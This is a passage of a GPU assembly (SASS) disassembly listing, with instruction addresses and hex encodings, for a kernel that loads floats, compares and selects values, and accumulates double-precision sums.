/*0048*/ XMAD.PSL.CBCC R0, R0.H1, R3.H1, R2 ; /* 0x5b30011800370000 */
/*0050*/ SHL R24, R0, 0x2 ; /* 0x3848000000270018 */
/*0058*/ IADD32I R4, R0.reuse, 0x1 ; /* 0x1c00000000170004 */
/* 0x001f9400fe2007e4 */
/*0068*/ SHR.U32 R3, R0, 0x1e ; /* 0x3828000001e70003 */
/*0070*/ IADD R2.CC, R24, c[0x0][0x140] ; /* 0x4c10800005071802 */
/*0078*/ SHR.U32 R5, R4, 0x1e ; /* 0x3828000001e70405 */
/* 0x001fc400fe0007f2 */
/*0088*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/*0090*/ { ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0098*/ LDG.E R2, [R2] }
/* 0xeed4200000070202 */
/* 0x001ec400fc4007e5 */
/*00a8*/ IADD32I R27, R0, 0x2 ; /* 0x1c0000000027001b */
/*00b0*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*00b8*/ LDG.E R11, [R4] ; /* 0xeed420000007040b */
/* 0x001f8800fcc207f1 */
/*00c8*/ SHR.U32 R7, R27.reuse, 0x1e ; /* 0x3828000001e71b07 */
/*00d0*/ ISCADD R6.CC, R27, c[0x0][0x140], 0x2 ; /* 0x4c18810005071b06 */
/*00d8*/ IADD.X R7, R7, c[0x0][0x144] ; /* 0x4c10080005170707 */
/* 0x081fc400fec007b1 */
/*00e8*/ LDG.E R10, [R6] ; /* 0xeed420000007060a */
/*00f0*/ IADD32I R12, R0, 0x3 ; /* 0x1c0000000037000c */
/*00f8*/ SHR.U32 R8, R12.reuse, 0x1e ; /* 0x3828000001e70c08 */
/* 0x001ed400fc4007e6 */
/*0108*/ ISCADD R12.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c0c */
/*0110*/ IADD.X R13, R8, c[0x0][0x144] ; /* 0x4c1008000517080d */
/*0118*/ LDG.E R14, [R12] ; /* 0xeed4200000070c0e */
/* 0x001c4480fe2007f3 */
/*0128*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/*0130*/ FSETP.GT.AND P0, PT, R2, R11.reuse, PT ; /* 0x5bb4038000b70207 */
/*0138*/ F2F.F64.F32 R2, R2 ; /* 0x5ca8000000270b02 */
/* 0x001c8c00fe600715 */
/*0148*/ F2F.F64.F32 R4, R11 ; /* 0x5ca8000000b70b04 */
/*0150*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/*0158*/ F2F.F64.F32 R6, R10 ; /* 0x5ca8000000a70b06 */
/* 0x001fd400fe200ff1 */
/*0168*/ SEL R8, R2, R4, P0 ; /* 0x5ca0000000470208 */
/*0170*/ SEL R9, R3, R5, P0 ; /* 0x5ca0000000570309 */
/*0178*/ FSETP.GT.AND P2, PT, R11, R10, PT ; /* 0x5bb4038000a70b17 */
/* 0x001fa800fe201711 */
/*0188*/ DSETP.GT.AND P1, PT, R8, R6, PT ; /* 0x5b8403800067080f */
/*0190*/ SEL R10, R4, R2, P0 ; /* 0x5ca000000027040a */
/*0198*/ SEL R11, R5, R3, P0 ; /* 0x5ca000000037050b */
/* 0x001fc400fe210731 */
/*01a8*/ F2F.F64.F32 R2, R14 ; /* 0x5ca8000000e70b02 */
/*01b0*/ SEL R12, R4, R6, P2 ; /* 0x5ca001000067040c */
/*01b8*/ SEL R13, R5, R7, P2 ; /* 0x5ca001000077050d */
/* 0x005c0800fe800ff1 */
/*01c8*/ SEL R8, R6, R8, P1 ; /* 0x5ca0008000870608 */
/*01d0*/ SEL R9, R7, R9, P1 ; /* 0x5ca0008000970709 */
/*01d8*/ DSETP.GT.AND P1, PT, R12, R2, PT ; /* 0x5b84038000270c0f */
/* 0x001fec00fe200731 */
/*01e8*/ DSETP.GT.AND P0, PT, R10, R8, PT ; /* 0x5b84038000870a07 */
/*01f0*/ SEL R6, R6, R4, P2 ; /* 0x5ca0010000470606 */
/*01f8*/ SEL R7, R7, R5, P2 ; /* 0x5ca0010000570707 */
/* 0x005f8400fe200ff1 */
/*0208*/ SEL R12, R2, R12, P1 ; /* 0x5ca0008000c7020c */
/*0210*/ SEL R13, R3, R13, P1 ; /* 0x5ca0008000d7030d */
/*0218*/ SEL R2, R10, R8, P0 ; /* 0x5ca0000000870a02 */
/* 0x001fc800fe2007f1 */
/*0228*/ SEL R4, R8, R10, P0 ; /* 0x5ca0000000a70804 */
/*0230*/ SEL R3, R11, R9, P0 ; /* 0x5ca0000000970b03 */
/*0238*/ SEL R5, R9, R11, P0 ; /* 0x5ca0000000b70905 */
/* 0x005c8c00e7000714 */
/*0248*/ DSETP.GT.AND P0, PT, R6, R12, PT ; /* 0x5b84038000c70607 */
/*0250*/ DFMA R2, R2, 2, R4 ; /* 0x3670024000070202 */
/*0258*/ DADD R2, R2, +QNAN ; /* 0x3870007ff8070202 */
/* 0x001fcc00fe200ff1 */
/*0268*/ SEL R4, R6, R12, P0 ; /* 0x5ca0000000c70604 */
/*0270*/ SEL R5, R7, R13, P0 ; /* 0x5ca0000000d70705 */
/*0278*/ SEL R6, R12, R6, P0 ; /* 0x5ca0000000670c06 */
/* 0x001cc400fec01711 */
/*0288*/ DADD R2, RZ, R2 ; /* 0x5c7000000027ff02 */
/*0290*/ SEL R7, R13, R7, P0 ; /* 0x5ca0000000770d07 */
/*0298*/ DFMA R4, R4, 2, R6 ; /* 0x3670034000070404 */
/* 0x003cf802e6200f07 */
/*02a8*/ F2F.F32.F64 R2, R2 ; /* 0x5ca8000000270e02 */
/*02b0*/ DADD R4, R4, +QNAN ; /* 0x3870007ff8070404 */
/*02b8*/ F2F.F64.F32 R2, R2 ; /* 0x5ca8000000270b02 */
/* 0x003f84010700171e */
/*02c8*/ DADD R2, R4, R2 ; /* 0x5c70000000270402 */
/*02d0*/ F2F.F32.F64 R20, R2 ; /* 0x5ca8000000270e14 */
/*02d8*/ SHR.U32 R2, R27, 0x1e ; /* 0x3828000001e71b02 */
/* 0x001f8400fea207f1 */
/*02e8*/ IADD32I R8, R27.reuse, 0x1 ; /* 0x1c00000000171b08 */
/*02f0*/ ISCADD R6.CC, R27, c[0x0][0x140], 0x2 ; /* 0x4c18810005071b06 */
/*02f8*/ SHR.U32 R3, R8, 0x1e ; /* 0x3828000001e70803 */
/* 0x001ec400fe0007f2 */
/*0308*/ IADD.X R7, R2, c[0x0][0x144] ; /* 0x4c10080005170207 */
/*0310*/ { ISCADD R8.CC, R8, c[0x0][0x140], 0x2 ; /* 0x4c18810005070808 */
/*0318*/ LDG.E R6, [R6] }
/* 0xeed4200000070606 */
/* 0x081fc000fe4007e5 */
/*0328*/ IADD32I R2, R27, 0x2 ; /* 0x1c00000000271b02 */
/*0330*/ IADD.X R9, R3, c[0x0][0x144] ; /* 0x4c10080005170309 */
/*0338*/ { SHR.U32 R3, R2.reuse, 0x1e ; /* 0x3828000001e70203 */
/* 0x001f9400fc2007b1 */
/*0348*/ LDG.E R9, [R8] }
/* 0xeed4200000070809 */
/*0350*/ ISCADD R2.CC, R2, c[0x0][0x140], 0x2 ; /* 0x4c18810005070202 */
/*0358*/ IADD32I R10, R27, 0x3 ; /* 0x1c00000000371b0a */
/* 0x081fc400162007e2 */
/*0368*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/*0370*/ LDG.E R4, [R2] ; /* 0xeed4200000070204 */
/*0378*/ SHR.U32 R5, R10.reuse, 0x1e ; /* 0x3828000001e70a05 */
/* 0x001ec400fc4007e6 */
/*0388*/ ISCADD R10.CC, R10, c[0x0][0x140], 0x2 ; /* 0x4c18810005070a0a */
/*0390*/ IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0398*/ LDG.E R5, [R10] ; /* 0xeed4200000070a05 */
/* 0x001f9840fe2007f6 */
/*03a8*/ IADD32I R16, R27, 0x4 ; /* 0x1c00000000471b10 */
/*03b0*/ SHR.U32 R12, R16.reuse, 0x1e ; /* 0x3828000001e7100c */
/*03b8*/ ISCADD R16.CC, R16, c[0x0][0x140], 0x2 ; /* 0x4c18810005071010 */
/* 0x001fd800f62007e2 */
/*03c8*/ IADD.X R17, R12, c[0x0][0x144] ; /* 0x4c10080005170c11 */
/*03d0*/ LDG.E R16, [R16] ; /* 0xeed4200000071010 */
/*03d8*/ IADD32I R22, R27, 0x5 ; /* 0x1c00000000571b16 */
/* 0x001f8800fcc20ff1 */
/*03e8*/ SHR.U32 R2, R22.reuse, 0x1e ; /* 0x3828000001e71602 */
/*03f0*/ ISCADD R22.CC, R22, c[0x0][0x140], 0x2 ; /* 0x4c18810005071616 */
/*03f8*/ IADD.X R23, R2, c[0x0][0x144] ; /* 0x4c10080005170217 */
/* 0x001fcc02e28007b1 */
/*0408*/ LDG.E R22, [R22] ; /* 0xeed4200000071616 */
/*0410*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/*0418*/ DEPBAR.LE SB5, 0x4 ; /* 0xf0f0000034470000 */
/* 0x001ca080fe200731 */
/*0428*/ F2F.F64.F32 R12, R6 ; /* 0x5ca8000000670b0c */
/*0430*/ FSETP.GT.AND P0, PT, R6, R9.reuse, PT ; /* 0x5bb4038000970607 */
/*0438*/ F2F.F64.F32 R2, R9 ; /* 0x5ca8000000970b02 */
/* 0x001d4480fe2007f3 */
/*0448*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/*0450*/ FSETP.GT.AND P2, PT, R9, R4.reuse, PT ; /* 0x5bb4038000470917 */
/*0458*/ F2F.F64.F32 R36, R4 ; /* 0x5ca8000000470b24 */
/* 0x001fcc00fca017f1 */
/*0468*/ SEL R6, R12, R2, P0 ; /* 0x5ca0000000270c06 */
/*0470*/ SEL R7, R13, R3, P0 ; /* 0x5ca0000000370d07 */
/*0478*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/* 0x081fc404ea200731 */
/*0488*/ F2F.F64.F32 R14, R5 ; /* 0x5ca8000000570b0e */
/*0490*/ DSETP.GT.AND P1, PT, R6, R36, PT ; /* 0x5b8403800247060f */
/*0498*/ SEL R8, R2.reuse, R36, P2 ; /* 0x5ca0010002470208 */
/* 0x005cc400fca007f1 */
/*04a8*/ SEL R9, R3, R37, P2 ; /* 0x5ca0010002570309 */
/*04b0*/ SEL R32, R2, R12, P0 ; /* 0x5ca0000000c70220 */
/*04b8*/ DSETP.GT.AND P3, PT, R8, R14, PT ; /* 0x5b84038000e7081f */
/* 0x089fc400fea007f1 */
/*04c8*/ SEL R33, R3, R13, P0 ; /* 0x5ca0000000d70321 */
/*04d0*/ FSETP.GT.AND P0, PT, R4, R5, PT ; /* 0x5bb4038000570407 */
/*04d8*/ SEL R18, R36.reuse, R6, P1 ; /* 0x5ca0008000672412 */
/* 0x001fd000fc2007f1 */
/*04e8*/ SEL R19, R37, R7, P1 ; /* 0x5ca0008000772513 */
/*04f0*/ SEL R2, R36, R2, P2 ; /* 0x5ca0010000272402 */
/*04f8*/ SEL R3, R37, R3, P2 ; /* 0x5ca0010000372503 */
/* 0x001fa802fe200751 */
/*0508*/ DSETP.GT.AND P2, PT, R32, R18, PT ; /* 0x5b84038001272017 */
/*0510*/ SEL R12, R14, R8, P3 ; /* 0x5ca0018000870e0c */
/*0518*/ SEL R13, R15, R9, P3 ; /* 0x5ca0018000970f0d */
/* 0x001fc400e62007f3 */
/*0528*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/*0530*/ F2F.F64.F32 R8, R16 ; /* 0x5ca8000001070b08 */
/*0538*/ SEL R6, R36, R14, P0 ; /* 0x5ca0000000e72406 */
/* 0x001f9000ee2007f1 */
/*0548*/ SEL R7, R37, R15, P0 ; /* 0x5ca0000000f72507 */
/*0550*/ DSETP.GT.AND P1, PT, R2, R12, PT ; /* 0x5b84038000c7020f */
/*0558*/ SEL R10, R14, R36, P0 ; /* 0x5ca0000002470e0a */
/* 0x001fc400fe201731 */
/*0568*/ DSETP.GT.AND P3, PT, R6, R8, PT ; /* 0x5b8403800087061f */
/*0570*/ SEL R11, R15, R37, P0 ; /* 0x5ca0000002570f0b */
/*0578*/ FSETP.GT.AND P0, PT, R5, R16, PT ; /* 0x5bb4038001070507 */
/* 0x001f8400fe2027f1 */
/*0588*/ SEL R4, R32, R18, P2 ; /* 0x5ca0010001272004 */
/*0590*/ SEL R5, R33, R19, P2 ; /* 0x5ca0010001372105 */
/*0598*/ SEL R18, R18, R32, P2 ; /* 0x5ca0010002071212 */
/* 0x0009c808fe4007f4 */
/*05a8*/ SEL R19, R19, R33, P2 ; /* 0x5ca0010002171313 */
/*05b0*/ SEL R30, R12, R2, P1 ; /* 0x5ca0008000270c1e */
/*05b8*/ DFMA R18, R4, 2, R18 ; /* 0x3670094000070412 */
/* 0x005fc400fe2027e1 */
/*05c8*/ SEL R4, R2, R12, P1 ; /* 0x5ca0008000c70204 */
/*05d0*/ IADD32I R12, R27, 0x6 ; /* 0x1c00000000671b0c */
/*05d8*/ SEL R36, R8, R6, P3 ; /* 0x5ca0018000670824 */
/* 0x001fc440fe2007f4 */
/*05e8*/ SEL R37, R9, R7, P3 ; /* 0x5ca0018000770925 */
/*05f0*/ SHR.U32 R2, R12.reuse, 0x1e ; /* 0x3828000001e70c02 */
/*05f8*/ ISCADD R12.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c0c */
/* 0x001fc400fe200721 */
/*0608*/ DSETP.GT.AND P2, PT, R10, R36, PT ; /* 0x5b84038002470a17 */
/*0610*/ SEL R5, R3, R13, P1 ; /* 0x5ca0008000d70305 */
/*0618*/ SEL R31, R13, R3, P1 ; /* 0x5ca0008000370d1f */
/* 0x001ec400fc404712 */
/*0628*/ DADD R18, R18, +QNAN ; /* 0x3870007ff8071212 */
/*0630*/ IADD.X R13, R2, c[0x0][0x144] ; /* 0x4c1008000517020d */
/*0638*/ LDG.E R13, [R12] ; /* 0xeed4200000070c0d */
/* 0x005fc4010e800153 */
/*0648*/ DFMA R30, R4, 2, R30 ; /* 0x36700f400007041e */
/*0650*/ DADD R20, R18, R20 ; /* 0x5c70000001471214 */
/*0658*/ SEL R4, R10, R36, P2 ; /* 0x5ca0010002470a04 */
/* 0x001fc400fe200fe1 */
/*0668*/ SEL R18, R36, R10, P2 ; /* 0x5ca0010000a72412 */
/*0670*/ IADD32I R10, R27, 0x7 ; /* 0x1c00000000771b0a */
/*0678*/ SEL R5, R11, R37, P2 ; /* 0x5ca0010002570b05 */
/* 0x001f9840fe2007fd */
/*0688*/ SEL R19, R37, R11, P2 ; /* 0x5ca0010000b72513 */
/*0690*/ SHR.U32 R11, R10.reuse, 0x1e ; /* 0x3828000001e70a0b */
/*0698*/ ISCADD R10.CC, R10, c[0x0][0x140], 0x2 ; /* 0x4c18810005070a0a */
/* 0x001fcc00f6a007e2 */
/*06a8*/ IADD.X R11, R11, c[0x0][0x144] ; /* 0x4c10080005170b0b */
/*06b0*/ LDG.E R12, [R10] ; /* 0xeed4200000070a0c */
/*06b8*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/* 0x001fc400fe240711 */
/*06c8*/ F2F.F64.F32 R6, R22.reuse ; /* 0x5ca8000001670b06 */
/*06d0*/ SEL R32, R14, R8, P0 ; /* 0x5ca0000000870e20 */
/*06d8*/ SEL R33, R15, R9, P0 ; /* 0x5ca0000000970f21 */
/* 0x081fc401e30007e5 */
/*06e8*/ FSETP.GT.AND P1, PT, R16, R22, PT ; /* 0x5bb403800167100f */
/*06f0*/ DSETP.GT.AND P3, PT, R32, R6, PT ; /* 0x5b8403800067201f */
/*06f8*/ SEL R34, R8.reuse, R6, P1 ; /* 0x5ca0008000670822 */
/* 0x001fc401fe2007f6 */
/*0708*/ SEL R35, R9, R7, P1 ; /* 0x5ca0008000770923 */
/*0710*/ SEL R32, R6, R32, P3 ; /* 0x5ca0018002070620 */
/*0718*/ SEL R33, R7, R33, P3 ; /* 0x5ca0018002170721 */
/* 0x001fd400fe2007e1 */
/*0728*/ SEL R14, R8, R14, P0 ; /* 0x5ca0000000e7080e */
/*0730*/ SEL R15, R9, R15, P0 ; /* 0x5ca0000000f7090f */
/*0738*/ SEL R2, R6, R8, P1 ; /* 0x5ca0008000870602 */
/* 0x0000c400fe200711 */
/*0748*/ DSETP.GT.AND P0, PT, R14, R32, PT ; /* 0x5b84038002070e07 */
/*0750*/ SEL R3, R7, R9, P1 ; /* 0x5ca0008000970703 */
/*0758*/ DFMA R18, R4, 2, R18 ; /* 0x3670094000070412 */
/* 0x003fc404eb604761 */
/*0768*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/*0770*/ DADD R30, R30, +QNAN ; /* 0x3870007ff8071e1e */
/*0778*/ SEL R4, R14, R32, P0 ; /* 0x5ca0000002070e04 */
/* 0x00814408ebc007f1 */
/*0788*/ SEL R38, R32, R14, P0 ; /* 0x5ca0000000e72026 */
/*0790*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/*0798*/ DADD R20, R30, R20 ; /* 0x5c70000001471e14 */
/* 0x001fdc00ec2007f3 */
/*07a8*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/*07b0*/ F2F.F64.F32 R16, R13 ; /* 0x5ca8000000d70b10 */
/*07b8*/ FSETP.GT.AND P2, PT, R22, R13, PT ; /* 0x5bb4038000d71617 */
/* 0x001fc400fea04771 */
/*07c8*/ DSETP.GT.AND P3, PT, R34, R16, PT ; /* 0x5b8403800107221f */
/*07d0*/ IADD32I R22, R27, 0x8 ; /* 0x1c00000000871b16 */
/*07d8*/ SEL R36, R6, R16, P2 ; /* 0x5ca0010001070624 */
/* 0x001fc408fc2007f8 */
/*07e8*/ SEL R37, R7, R17, P2 ; /* 0x5ca0010001170725 */
/*07f0*/ SEL R8, R16, R34, P3 ; /* 0x5ca0018002271008 */
/*07f8*/ SEL R9, R17, R35, P3 ; /* 0x5ca0018002371109 */
/* 0x001fd840fe210771 */
/*0808*/ F2F.F64.F32 R34, R12 ; /* 0x5ca8000000c70b22 */
/*0810*/ SHR.U32 R14, R22.reuse, 0x1e ; /* 0x3828000001e7160e */
/*0818*/ ISCADD R22.CC, R22, c[0x0][0x140], 0x2 ; /* 0x4c18810005071616 */
/* 0x001f8800e0204771 */
/*0828*/ DSETP.GT.AND P3, PT, R36, R34, PT ; /* 0x5b8403800227241f */
/*0830*/ DSETP.GT.AND P1, PT, R2, R8, PT ; /* 0x5b8403800087020f */
/*0838*/ IADD.X R23, R14, c[0x0][0x144] ; /* 0x4c10080005170e17 */
/* 0x001fc408fc2007bb */
/*0848*/ LDG.E R23, [R22] ; /* 0xeed4200000071617 */
/*0850*/ SEL R10, R34, R36, P3 ; /* 0x5ca001800247220a */
/*0858*/ IADD32I R36, R27, 0x9 ; /* 0x1c00000000971b24 */
/* 0x081fc400fe800ff1 */
/*0868*/ SEL R30, R2, R8, P1 ; /* 0x5ca000800087021e */
/*0870*/ SEL R32, R8, R2, P1 ; /* 0x5ca0008000270820 */
/*0878*/ SHR.U32 R2, R36.reuse, 0x1e ; /* 0x3828000001e72402 */
/* 0x001f8800fca007f1 */
/*0888*/ ISCADD R36.CC, R36, c[0x0][0x140], 0x2 ; /* 0x4c18810005072424 */
/*0890*/ SEL R11, R35, R37, P3 ; /* 0x5ca001800257230b */
/*0898*/ IADD.X R37, R2, c[0x0][0x144] ; /* 0x4c10080005170225 */
/* 0x005cdc04e22007b1 */
/*08a8*/ LDG.E R22, [R36] ; /* 0xeed4200000072416 */
/*08b0*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/*08b8*/ DADD R18, R18, +QNAN ; /* 0x3870007ff8071212 */
/* 0x001ff400fe200f31 */
/*08c8*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/*08d0*/ SEL R5, R15, R33, P0 ; /* 0x5ca0000002170f05 */
/*08d8*/ SEL R39, R33, R15, P0 ; /* 0x5ca0000000f72127 */
/* 0x003c4400e6e01701 */
/*08e8*/ DADD R20, R18, R20 ; /* 0x5c70000001471214 */
/*08f0*/ DFMA R38, R4, 2, R38 ; /* 0x3670134000070426 */
/*08f8*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/* 0x003cc400fec01731 */
/*0908*/ DADD R38, R38, +QNAN ; /* 0x3870007ff8072626 */
/*0910*/ SEL R6, R16, R6, P2 ; /* 0x5ca0010000671006 */
/*0918*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/* 0x001fd400fe2007e1 */
/*0928*/ SEL R7, R17, R7, P2 ; /* 0x5ca0010000771107 */
/*0930*/ FSETP.GT.AND P2, PT, R13, R12, PT ; /* 0x5bb4038000c70d17 */
/*0938*/ SEL R31, R3, R9, P1 ; /* 0x5ca000800097031f */
/* 0x001cd400fe201711 */
/*0948*/ DADD R20, R38, R20 ; /* 0x5c70000001472614 */
/*0950*/ SEL R33, R9, R3, P1 ; /* 0x5ca0008000370921 */
/*0958*/ DSETP.GT.AND P0, PT, R6, R10, PT ; /* 0x5b84038000a70607 */
/* 0x001fc401e2200741 */
/*0968*/ DFMA R32, R30, 2, R32 ; /* 0x3670104000071e20 */
/*0970*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/*0978*/ SEL R18, R16, R34, P2 ; /* 0x5ca0010002271012 */
/* 0x009d4400fe8007f1 */
/*0988*/ SEL R19, R17, R35, P2 ; /* 0x5ca0010002371113 */
/*0990*/ SEL R14, R34, R16, P2 ; /* 0x5ca001000107220e */
/*0998*/ DADD R32, R32, +QNAN ; /* 0x3870007ff8072020 */
/* 0x005fc400fe200f41 */
/*09a8*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/*09b0*/ SEL R15, R35, R17, P2 ; /* 0x5ca001000117230f */
/*09b8*/ SEL R30, R10, R6, P0 ; /* 0x5ca0000000670a1e */
/* 0x001f8404062007f5 */
/*09c8*/ SEL R13, R7, R11, P0 ; /* 0x5ca0000000b7070d */
/*09d0*/ DADD R20, R32, R20 ; /* 0x5c70000001472014 */
/*09d8*/ SEL R31, R11, R7, P0 ; /* 0x5ca0000000770b1f */
/* 0x003c4402e3c00ff6 */
/*09e8*/ IADD32I R32, R27, 0xa ; /* 0x1c00000000a71b20 */
/*09f0*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/*09f8*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/* 0x101cc400fe6007e1 */
/*0a08*/ IADD32I R29, R27, 0xc ; /* 0x1c00000000c71b1d */
/*0a10*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/*0a18*/ F2F.F64.F32 R4, R23.reuse ; /* 0x5ca8000001770b04 */
/* 0x001fc402e62007f7 */
/*0a28*/ FSETP.GT.AND P2, PT, R12, R23, PT ; /* 0x5bb4038001770c17 */
/*0a30*/ DSETP.GT.AND P3, PT, R18, R4, PT ; /* 0x5b8403800047121f */
/*0a38*/ SEL R12, R6, R10, P0 ; /* 0x5ca0000000a7060c */
/* 0x001fc400fe6007e1 */
/*0a48*/ SHR.U32 R6, R32, 0x1e ; /* 0x3828000001e72006 */
/*0a50*/ ISCADD R32.CC, R32, c[0x0][0x140], 0x2 ; /* 0x4c18810005072020 */
/*0a58*/ SEL R2, R34, R4, P2 ; /* 0x5ca0010000472202 */
/* 0x005fc400fee00751 */
/*0a68*/ DFMA R30, R12, 2, R30 ; /* 0x36700f4000070c1e */
/*0a70*/ SEL R3, R35, R5, P2 ; /* 0x5ca0010000572303 */
/*0a78*/ SEL R18, R4, R18, P3 ; /* 0x5ca0018001270412 */
/* 0x001fd020e62007e1 */
/*0a88*/ SEL R19, R5, R19, P3 ; /* 0x5ca0018001370513 */
/*0a90*/ F2F.F64.F32 R16, R22 ; /* 0x5ca8000001670b10 */
/*0a98*/ IADD.X R33, R6, c[0x0][0x144] ; /* 0x4c10080005170621 */
/* 0x009c4800f6200770 */
/*0aa8*/ { DSETP.GT.AND P1, PT, R14, R18, PT ; /* 0x5b84038001270e0f */
/*0ab0*/ LDG.E R25, [R32] }
/* 0xeed4200000072019 */
/*0ab8*/ DADD R30, R30, +QNAN ; /* 0x3870007ff8071e1e */
/* 0x003fc40108401736 */
/*0ac8*/ DSETP.GT.AND P3, PT, R2, R16, PT ; /* 0x5b8403800107021f */
/*0ad0*/ DADD R20, R30, R20 ; /* 0x5c70000001471e14 */
/*0ad8*/ IADD32I R30, R27, 0xb ; /* 0x1c00000000b71b1e */
/* 0x011fc400fe4007f1 */
/*0ae8*/ SEL R8, R4, R34, P2 ; /* 0x5ca0010002270408 */
/*0af0*/ SEL R9, R5, R35, P2 ; /* 0x5ca0010002370509 */
/*0af8*/ SEL R12, R14, R18, P1 ; /* 0x5ca0008001270e0c */
/* 0x001fc402fc2007f2 */
/*0b08*/ SEL R18, R18, R14, P1 ; /* 0x5ca0008000e71212 */
/*0b10*/ SEL R2, R16, R2, P3 ; /* 0x5ca0018000271002 */
/*0b18*/ SEL R3, R17, R3, P3 ; /* 0x5ca0018000371103 */
/* 0x001c4400fe8207f1 */
/*0b28*/ SHR.U32 R14, R30.reuse, 0x1e ; /* 0x3828000001e71e0e */
/*0b30*/ ISCADD R30.CC, R30, c[0x0][0x140], 0x2 ; /* 0x4c18810005071e1e */
/*0b38*/ DSETP.GT.AND P0, PT, R8, R2, PT ; /* 0x5b84038000270807 */
/* 0x001f8800fc2007f1 */
/*0b48*/ SEL R13, R15, R19, P1 ; /* 0x5ca0008001370f0d */
/*0b50*/ SEL R19, R19, R15, P1 ; /* 0x5ca0008000f71313 */
/*0b58*/ IADD.X R31, R14, c[0x0][0x144] ; /* 0x4c10080005170e1f */
/* 0x001d5c04e64007b1 */
/*0b68*/ LDG.E R26, [R30] ; /* 0xeed4200000071e1a */
/*0b70*/ F2F.F32.F64 R20, R20 ; /* 0x5ca8000001470e14 */
/*0b78*/ DFMA R18, R12, 2, R18 ; /* 0x3670094000070c12 */
/* 0x001f8402e2200ff1 */
/*0b88*/ SEL R14, R8, R2, P0 ; /* 0x5ca000000027080e */
/*0b90*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/*0b98*/ SEL R15, R9, R3, P0 ; /* 0x5ca000000037090f */
/* 0x001fc400fe202711 */
/*0ba8*/ DADD R18, R18, +QNAN ; /* 0x3870007ff8071212 */
/*0bb0*/ SEL R8, R2, R8, P0 ; /* 0x5ca0000000870208 */
/*0bb8*/ SEL R9, R3, R9, P0 ; /* 0x5ca0000000970309 */
/* 0x00208800fe8207f1 */
/*0bc8*/ SHR.U32 R3, R29.reuse, 0x1e ; /* 0x3828000001e71d03 */
/*0bd0*/ ISCADD R2.CC, R29, c[0x0][0x140], 0x2 ; /* 0x4c18810005071d02 */
/*0bd8*/ DADD R18, R18, R20 ; /* 0x5c70000001471212 */
/* 0x001ecc00fc400fe1 */
/*0be8*/ IADD32I R20, R27, 0xd ; /* 0x1c00000000d71b14 */
/*0bf0*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/*0bf8*/ LDG.E R3, [R2] ; /* 0xeed4200000070203 */
/* 0x001f8800fcc207f1 */
/*0c08*/ SHR.U32 R21, R20.reuse, 0x1e ; /* 0x3828000001e71415 */
/*0c10*/ ISCADD R20.CC, R20, c[0x0][0x140], 0x2 ; /* 0x4c18810005071414 */
/*0c18*/ IADD.X R21, R21, c[0x0][0x144] ; /* 0x4c10080005171515 */
/* 0x001fc400fda000b1 */
/*0c28*/ LDG.E R20, [R20] ; /* 0xeed4200000071414 */
/*0c30*/ FSETP.GT.AND P2, PT, R23, R22, PT ; /* 0x5bb4038001671717 */
/*0c38*/ SEL R10, R4, R16, P2 ; /* 0x5ca001000107040a */
/* 0x001fc400fe2007f1 */
/*0c48*/ SEL R11, R5, R17, P2 ; /* 0x5ca001000117050b */
/*0c50*/ SEL R4, R16, R4, P2 ; /* 0x5ca0010000471004 */
/*0c58*/ SEL R5, R17, R5, P2 ; /* 0x5ca0010000571105 */
/* 0x009d4402e7c00741 */
/*0c68*/ DFMA R8, R14, 2, R8 ; /* 0x3670044000070e08 */
/*0c70*/ F2F.F32.F64 R18, R18 ; /* 0x5ca8000001270e12 */
/*0c78*/ DADD R8, R8, +QNAN ; /* 0x3870007ff8070808 */
/* 0x0020c404e3c0175e */
/*0c88*/ F2F.F64.F32 R18, R18 ; /* 0x5ca8000001270b12 */
/*0c90*/ DADD R18, R8, R18 ; /* 0x5c70000001270812 */
/*0c98*/ F2F.F32.F64 R21, R18 ; /* 0x5ca8000001270e15 */
/* 0x001fcc00fc2007e1 */
/*0ca8*/ IADD32I R28, R28, 0xc ; /* 0x1c00000000c71c1c */
/*0cb0*/ MOV R27, R29 ; /* 0x5c98078001d7001b */
/*0cb8*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/* 0x009d5800fee40751 */
/*0cc8*/ F2F.F64.F32 R6, R25.reuse ; /* 0x5ca8000001970b06 */
/*0cd0*/ FSETP.GT.AND P2, PT, R22, R25, PT ; /* 0x5bb4038001971617 */
/*0cd8*/ DSETP.GT.AND P3, PT, R10, R6, PT ; /* 0x5b84038000670a1f */
/* 0x009ff400fd0007f1 */
/*0ce8*/ SEL R22, R16, R6, P2 ; /* 0x5ca0010000671016 */
/*0cf0*/ SEL R23, R17, R7, P2 ; /* 0x5ca0010000771117 */
/*0cf8*/ SEL R10, R6, R10, P3 ; /* 0x5ca0018000a7060a */
/* 0x001d4c00fe6207f0 */
